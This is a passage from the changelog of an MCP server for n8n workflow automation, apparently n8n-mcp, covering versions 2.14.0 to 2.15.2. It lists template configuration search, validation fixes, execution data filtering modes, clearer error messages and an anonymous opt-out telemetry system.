- **Reliability**: Try-catch ensures sanitization never breaks telemetry
## [2.15.2] - 2025-10-03
### Fixed
- **Template Search Performance & Reliability** - Enhanced `search_templates_by_metadata` with production-ready improvements
- **Ordering Stability**: Implemented CTE with VALUES clause to preserve exact Phase 1 ordering
- Prevents ordering discrepancies between ID selection and data fetch phases
- Ensures deterministic results across query phases
- **Defensive ID Validation**: Added type safety filters before Phase 2 query
- Validates only positive integers are used in the CTE
- Logs warnings for filtered invalid IDs
- **Performance Monitoring**: Added detailed timing metrics (phase1Ms, phase2Ms, totalMs)
- Enables quantifying optimization benefits
- Debug logging for all search operations
- **DRY Refactoring**: Extracted `buildMetadataFilterConditions` helper method
- Eliminates duplication between `searchTemplatesByMetadata` and `getMetadataSearchCount`
- Centralized filter-building logic
### Added
- **Comprehensive Test Coverage** - 31 new unit tests achieving 100% coverage for changed code
- `buildMetadataFilterConditions` - All filter combinations (11 tests)
- Performance logging validation (3 tests)
- ID filtering edge cases - negative, zero, non-integer, null (7 tests)
- `getMetadataSearchCount` - Shared helper usage (7 tests)
- Two-phase query optimization verification (3 tests)
- Fixed flaky integration tests with deterministic ordering using unique view counts
### Performance
- Query optimization maintains sub-1ms Phase 1 performance
- Two-phase approach prevents timeout on large template sets
- CTE-based ordering adds negligible overhead (<1ms)
### Test Results
- Unit tests: 31 new tests, all passing
- Integration tests: 36 passing, 1 skipped
- **Coverage**: 100% for changed code (previously 36.58% patch coverage)
## [2.15.0] - 2025-10-02
### 🚀 Major Features
#### P0-R3: Pre-extracted Template Configurations
- **Template-Based Configuration System** - 2,646 real-world node configurations from popular templates
- Pre-extracted node configurations from all workflow templates
- Ranked by template popularity (views)
- Includes metadata: complexity, use cases, credentials, expressions
- Query performance: <1ms (vs 30-60ms with previous system)
- Database size increase: ~513 KB for 2,000+ configurations
### Breaking Changes
#### Removed: `get_node_for_task` Tool
- **Reason**: Only 31 hardcoded tasks, 28% failure rate in production
- **Replacement**: Template-based examples with 2,646 real configurations
#### Migration Guide
**Before (v2.14.7):**
```javascript
// Get configuration for a task
get_node_for_task({ task: "receive_webhook" })
```
**After (v2.15.0):**
```javascript
// Option 1: Search nodes with examples
search_nodes({
query: "webhook",
includeExamples: true
})
// Returns: Top 2 real template configs per node
// Option 2: Get node essentials with examples
get_node_essentials({
nodeType: "nodes-base.webhook",
includeExamples: true
})
// Returns: Top 3 real template configs with full metadata
```
### Added
- **Enhanced `search_nodes` Tool**
- New parameter: `includeExamples` (boolean, default: false)
- Returns top 2 real-world configurations per node from popular templates
- Includes: configuration, template name, view count
- **Enhanced `get_node_essentials` Tool**
- New parameter: `includeExamples` (boolean, default: false)
- Returns top 3 real-world configurations with full metadata
- Includes: configuration, source template, complexity, use cases, credentials info
- **Database Schema**
- New table: `template_node_configs` - Pre-extracted node configurations
- New view: `ranked_node_configs` - Easy access to top 5 configs per node
- Optimized indexes for fast queries (<1ms)
- **Template Processing**
- Automatic config extraction during `npm run fetch:templates`
- Standalone extraction mode: `npm run fetch:templates:extract`
- Expression detection ({{...}}, $json, $node)
- Complexity analysis and use case extraction
- Ranking by template popularity
- Auto-creates `template_node_configs` table if missing
- **Comprehensive Test Suite**
- 85+ tests covering all aspects of template configuration system
- Integration tests for database operations and end-to-end workflows
- Unit tests for tool parameters, extraction logic, and ranking algorithm
- Fixtures for consistent test data across test suites
- Test documentation in P0-R3-TEST-PLAN.md
### Removed
- Tool: `get_node_for_task` (see Breaking Changes above)
- Tool documentation: `get-node-for-task.ts`
### Fixed
- **`search_nodes` includeExamples Support**
- Fixed `includeExamples` parameter not working due to missing FTS5 table
- Added example support to `searchNodesLIKE` fallback method
- Now returns template-based examples in all search scenarios
- Affects 100% of search_nodes calls (database lacks nodes_fts table)
### Deprecated
- `TaskTemplates` service marked for removal in v2.16.0
- `list_tasks` tool marked for deprecation (use template search instead)
### Performance
- Query time: <1ms for pre-extracted configs (vs 30-60ms for on-demand generation)
- 30-60x faster configuration lookups
- 85x more configuration examples (2,646 vs 31)
## [2.14.7] - 2025-10-02
### Fixed
- **Issue #248: Settings Validation Error** - Fixed "settings must NOT have additional properties" API errors
- Added `callerPolicy` property to `workflowSettingsSchema` to support valid n8n workflow setting
- Implemented whitelist-based settings filtering in `cleanWorkflowForUpdate()` to prevent API errors
- Filter removes UI-only properties (e.g., `timeSavedPerExecution`) that cause validation failures
- Only whitelisted properties are sent to n8n API: `executionOrder`, `timezone`, `saveDataErrorExecution`, `saveDataSuccessExecution`, `saveManualExecutions`, `saveExecutionProgress`, `executionTimeout`, `errorWorkflow`, `callerPolicy`
- Resolves workflow update failures caused by workflows fetched from n8n containing non-standard properties
- Added 6 comprehensive unit tests covering settings filtering scenarios
- **Issue #249: Misleading AddConnection Error Messages** - Enhanced parameter validation with helpful error messages
- Detect common parameter mistakes: using `sourceNodeId`/`targetNodeId` instead of correct `source`/`target`
- Improved error messages include:
- Identification of wrong parameter names with correction guidance
- Examples of correct usage
- List of available nodes when source/target not found
- Error messages now actionable instead of cryptic (was: "Source node not found: undefined")
- Added 8 comprehensive unit tests for parameter validation scenarios
- **P0-R1: Universal Node Type Normalization** - Eliminates 80% of validation errors
- Implemented `NodeTypeNormalizer` utility for consistent node type handling
- Automatically converts short forms to full forms (e.g., `nodes-base.webhook` → `n8n-nodes-base.webhook`)
- Applied normalization across all workflow validation entry points
- Updated workflow validator, handlers, and repository for universal normalization
- Fixed test expectations to match normalized node type format
- Resolves the single largest source of validation errors in production
### Added
- `NodeTypeNormalizer` utility class for universal node type normalization
- `normalizeToFullForm()` - Convert any node type variation to canonical form
- `normalizeWithDetails()` - Get normalization result with metadata
- `normalizeWorkflowNodeTypes()` - Batch normalize all nodes in a workflow
- Settings whitelist filtering in `cleanWorkflowForUpdate()` with comprehensive null-safety
- Enhanced `validateAddConnection()` with proactive parameter validation
- 14 new unit tests for issues #248 and #249 fixes
### Changed
- Node repository now uses `NodeTypeNormalizer` for all lookups
- Workflow validation applies normalization before structure checks
- Workflow diff engine validates connection parameters before processing
- Settings filtering applied to all workflow update operations
### Performance
- No performance impact - normalization adds <1ms overhead per workflow
- Settings filtering is O(9) - negligible impact
### Test Coverage
- n8n-validation tests: 73/73 passing (100% coverage)
- workflow-diff-engine tests: 110/110 passing (89.72% coverage)
- Total: 183 tests passing
### Impact
- **Issue #248**: Eliminates ALL settings validation errors for workflows with non-standard properties
- **Issue #249**: Provides clear, actionable error messages reducing user frustration
- **P0-R1**: Reduces validation error rate by 80% (addresses 4,800+ weekly errors)
- Combined impact: Expected overall error rate reduction from 5-10% to <2%
## [2.14.6] - 2025-10-01
### Enhanced
- **Webhook Error Messages**: Replaced generic "Please try again later or contact support" messages with actionable guidance
- Error messages now extract execution ID and workflow ID from failed webhook triggers
- Guide users to use `n8n_get_execution({id: executionId, mode: 'preview'})` for efficient debugging
- Format: "Workflow {workflowId} execution {executionId} failed. Use n8n_get_execution({id: '{executionId}', mode: 'preview'}) to investigate the error."
- When no execution ID available: "Workflow failed to execute. Use n8n_list_executions to find recent executions, then n8n_get_execution with mode='preview' to investigate."
### Added
- New error formatting functions in `n8n-errors.ts`:
- `formatExecutionError()` - Creates execution-specific error messages with debugging guidance
- `formatNoExecutionError()` - Provides guidance when execution context unavailable
- Enhanced `McpToolResponse` type with optional `executionId` and `workflowId` fields
- Error handling documentation in `n8n-trigger-webhook-workflow` tool docs
- 30 new comprehensive tests for error message formatting and webhook error handling
### Changed
- `handleTriggerWebhookWorkflow` now extracts execution context from error responses
- `getUserFriendlyErrorMessage` returns actual server error messages instead of generic text
- Tool documentation type enhanced with optional `errorHandling` field
### Fixed
- Test expectations updated to match new error message format (handlers-workflow-diff.test.ts)
### Benefits
- **Fast debugging**: Preview mode executes in <50ms (vs seconds for full data)
- **Efficient**: Uses ~500 tokens (vs 50K+ tokens for full execution data)
- **Safe**: No timeout or token limit risks
- **Actionable**: Clear next steps for users to investigate failures
### Impact
- Eliminates unhelpful "contact support" messages
- Provides specific, actionable debugging guidance
- Reduces debugging time by directing users to efficient tools
- 100% backward compatible - only improves error messages
## [2.14.5] - 2025-09-30
### Added
- **Intelligent Execution Data Filtering**: Major enhancement to `n8n_get_execution` tool to handle large datasets without exceeding token limits
- **Preview Mode**: Shows data structure, counts, and size estimates without actual data (~500 tokens)
- **Summary Mode**: Returns 2 sample items per node (safe default, ~2-5K tokens)
- **Filtered Mode**: Granular control with node filtering and custom item limits
- **Full Mode**: Complete data retrieval (explicit opt-in)
- Smart recommendations based on data size (guides optimal retrieval strategy)
- Structure-only mode (`itemsLimit: 0`) to see data schema without values
- Node-specific filtering with `nodeNames` parameter
- Input data inclusion option for debugging transformations
- Automatic size estimation and token consumption guidance
### Enhanced
- `n8n_get_execution` tool with new parameters:
- `mode`: 'preview' | 'summary' | 'filtered' | 'full'
- `nodeNames`: Filter to specific nodes
- `itemsLimit`: Control items per node (0=structure, -1=unlimited, default=2)
- `includeInputData`: Include input data for debugging
- Legacy `includeData` parameter mapped to new modes for backward compatibility
- Tool documentation with comprehensive examples and best practices
- Type system with new interfaces: `ExecutionMode`, `ExecutionPreview`, `ExecutionFilterOptions`, `FilteredExecutionResponse`
### Technical Improvements
- New `ExecutionProcessor` service with intelligent filtering logic
- Smart data truncation with metadata (`hasMoreData`, `truncated` flags)
- Validation for `itemsLimit` (capped at 1000, negative values default to 2)
- Error message extraction helper for consistent error handling
- Constants-based thresholds for easy tuning (20/50/100KB limits)
- 33 comprehensive unit tests with 78% coverage
- Null-safe data access throughout
### Performance
- Preview mode: <50ms (no data, just structure)
- Summary mode: <200ms (2 items per node)
- Filtered mode: 50-500ms (depends on filters)
- Size estimation within 10-20% accuracy
### Impact
- Solves token limit issues when inspecting large workflow executions
- Enables AI agents to understand execution data without overwhelming responses
- Reduces token usage by 80-95% for large datasets (50+ items)
- Maintains 100% backward compatibility with existing integrations
- Recommended workflow: preview → recommendation → filtered/summary
### Fixed
- Preview mode bug: Fixed API data fetching logic to ensure preview mode retrieves execution data for structure analysis and recommendation generation
- Changed `fetchFullData` condition in handlers-n8n-manager.ts to include preview mode
- Preview mode now correctly returns structure, item counts, and size estimates
- Recommendations are now accurate and prevent token overflow issues
### Migration Guide
- **No breaking changes**: Existing `n8n_get_execution` calls work unchanged
- New recommended workflow:
1. Call with `mode: 'preview'` to assess data size
2. Follow `recommendation.suggestedMode` from preview
3. Use `mode: 'filtered'` with `itemsLimit` for precise control
- Legacy `includeData: true` now maps to `mode: 'summary'` (safer default)
## [2.14.4] - 2025-09-30
### Added
- **Workflow Cleanup Operations**: Two new operations for `n8n_update_partial_workflow`
- `cleanStaleConnections`: Automatically removes connections referencing non-existent nodes
- `replaceConnections`: Replace entire connections object in a single operation
- **Graceful Error Handling**: Enhanced `removeConnection` with `ignoreErrors` flag
- **Best-Effort Mode**: New `continueOnError` mode for `WorkflowDiffRequest`
- Apply valid operations even if some fail
- Returns detailed results with `applied` and `failed` operation indices
- Maintains atomic mode as default for safety
### Enhanced
- Tool documentation for workflow cleanup scenarios
- Type system with new operation interfaces
- 15 new tests covering all new features
### Impact
- Reduces broken workflow fix time from 10-15 minutes to 30 seconds
- Token efficiency: `cleanStaleConnections` is 1 operation vs 10+ manual operations
- 100% backwards compatibility maintained
## [2.14.3] - 2025-09-30
### Added
- Incremental template updates with `npm run fetch:templates:update`
- Smart filtering for new templates (5-10 min vs 30-40 min full rebuild)
- 48 new templates (2,598 → 2,646 total)
### Fixed
- Template metadata generation: Updated to `gpt-4o-mini-2025-08-07` model
- Removed unsupported `temperature` parameter from OpenAI Batch API
- Template sanitization: Added Airtable PAT and GitHub token detection
- Sanitized 24 templates removing API tokens
### Updated
- n8n: 1.112.3 → 1.113.3
- n8n-core: 1.111.0 → 1.112.1
- n8n-workflow: 1.109.0 → 1.110.0
- @n8n/n8n-nodes-langchain: 1.111.1 → 1.112.2
- Node database rebuilt with 536 nodes from n8n v1.113.3
## [2.14.2] - 2025-09-29
### Fixed
- Validation false positives for Google Drive nodes with 'fileFolder' resource
- Added node type normalization to handle both `n8n-nodes-base.` and `nodes-base.` prefixes correctly
- Fixed resource validation to properly recognize all valid resource types
- Default operations are now properly applied when not specified
- Property visibility is now correctly checked with defaults applied
- Code node validation incorrectly flagging valid n8n expressions as syntax errors
- Removed overly aggressive regex pattern `/\)\s*\)\s*{/` that flagged valid expressions
- Valid patterns like `$('NodeName').first().json` are now correctly recognized
- Function chaining and method chaining no longer trigger false positives
- Enhanced error handling in repository methods based on code review feedback
- Added try-catch blocks to `getNodePropertyDefaults` and `getDefaultOperationForResource`
- Validates data structures before accessing to prevent crashes with malformed node data
- Returns safe defaults on errors to ensure validation continues
### Added
- Comprehensive test coverage for validation fixes in `tests/unit/services/validation-fixes.test.ts`
- New repository methods for better default value handling:
- `getNodePropertyDefaults()` - retrieves default values for node properties
- `getDefaultOperationForResource()` - gets default operation for a specific resource
### Changed
- Enhanced `filterPropertiesByMode` to return both filtered properties and config with defaults applied
- Improved node type validation to accept both valid prefix formats
## [2.14.1] - 2025-09-26
### Changed
- **BREAKING**: Refactored telemetry system with major architectural improvements
- Split 636-line TelemetryManager into 7 focused modules (event-tracker, batch-processor, event-validator, rate-limiter, circuit-breaker, workflow-sanitizer, config-manager)
- Changed TelemetryManager constructor to private, use `getInstance()` method now
- Implemented lazy initialization pattern to avoid early singleton creation
### Added
- Security & Privacy enhancements for telemetry:
- Comprehensive input validation with Zod schemas
- Enhanced sanitization of sensitive data (URLs, API keys, emails)
- Expanded sensitive key detection patterns (25+ patterns)
- Row Level Security on Supabase backend
- Data deletion contact info (romuald@n8n-mcp.com)
- Performance & Reliability improvements:
- Sliding window rate limiter (100 events/minute)
- Circuit breaker pattern for network failures
- Dead letter queue for failed events
- Exponential backoff with jitter for retries
- Performance monitoring with overhead tracking (<5%)
- Memory-safe array limits in rate limiter
- Comprehensive test coverage enhancements:
- Added 662 lines of new telemetry tests
- Enhanced config-manager tests with 17 new edge cases
- Enhanced workflow-sanitizer tests with 19 new edge cases
- Improved coverage from 63% to 91% for telemetry module
- Branch coverage improved from 69% to 87%
### Fixed
- TypeScript lint errors in telemetry test files
- Corrected variable name conflicts in integration tests
- Fixed process.exit mock implementation in batch-processor tests
- Fixed tuple type annotations for workflow node positions
- Resolved MockInstance type import issues
- Test failures in CI pipeline
- Fixed test timeouts caused by improper fake timer usage
- Resolved Timer.unref() compatibility issues
- Fixed event validator filtering standalone 'key' property
- Corrected batch processor circuit breaker behavior
- TypeScript error in telemetry test preventing CI build
- Added @supabase/supabase-js to Docker builder stage and runtime dependencies
## [2.14.0] - 2025-09-26
### Added
- Anonymous telemetry system with Supabase integration to understand usage patterns
- Tracks active users with deterministic anonymous IDs
- Records MCP tool usage frequency and error rates
- Captures sanitized workflow structures on successful validation
- Monitors common error patterns for improvement insights
- Zero-configuration design with opt-out support via N8N_MCP_TELEMETRY_DISABLED environment variable
- Enhanced telemetry tracking methods:
- `trackSearchQuery` - Records search patterns and result counts
- `trackValidationDetails` - Captures validation errors and warnings
- `trackToolSequence` - Tracks AI agent tool usage sequences
- `trackNodeConfiguration` - Records common node configuration patterns
- `trackPerformanceMetric` - Monitors operation performance
- Privacy-focused workflow sanitization:
- Removes all sensitive data (URLs, API keys, credentials)
- Generates workflow hashes for deduplication
- Preserves only structural information
- Comprehensive test coverage for telemetry components (91%+ coverage)
### Fixed
- Fixed TypeErrors in `get_node_info`, `get_node_essentials`, and `get_node_documentation` tools that were affecting 50% of calls
- Added null safety checks for undefined node properties
- Fixed multi-process telemetry issues with immediate flush strategy
- Resolved RLS policy and permission issues with Supabase
### Changed
- Updated Docker configuration to include Supabase client for telemetry support
- Enhanced workflow validation tools to track validated workflows
- Improved error handling with proper null coalescing operators
### Documentation
- Added PRIVACY.md with comprehensive privacy policy
- Added telemetry configuration instructions to README
- Updated CLAUDE.md with telemetry system architecture
## Previous Versions
For changes in previous versions, please refer to the git history and release notes.